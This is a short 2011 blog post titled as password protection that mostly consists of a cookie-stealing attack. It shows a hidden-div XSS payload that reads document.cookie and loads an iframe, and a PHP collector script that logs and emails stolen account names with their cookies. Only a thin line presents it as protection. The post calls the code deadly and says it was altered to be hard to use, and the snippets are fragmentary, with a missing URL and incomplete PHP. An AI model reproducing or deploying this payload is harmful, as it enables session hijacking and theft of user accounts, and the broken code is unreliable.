Protect you Password from Hackers
>> Monday, February 07, 2011
Protect your yahoo account and every account in general and should not be used for stealing someone's info, password etc...
<DIV id=b style="VISIBILITY: hidden">
<STYLE onload="window.status='';
var x = escape(document.cookie).substr(0,1900);
b.innerHTML='<iframe src=
frameborder=0 width=10 height=10></iframe>';" type=text/css>
This script calls the following php code$file="cookie.log";
if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){
$logcookie = $_REQUEST["cookie"];
$logcookie = rawurldecode($logcookie);
$logemail = $_REQUEST["id"];
$logemail = rawurldecode($logemail);
if (file_exists($file)) {
$handle=fopen($file, "r+");
$handle=fopen($file, "w");
fwrite($handle, "$logemail - $logcookie\n$filecontence\n ");
//Writing email address and cookie then the rest of the log
mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n");
This will write the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. The code is a little changed to make it hard to use without PHP knowledge.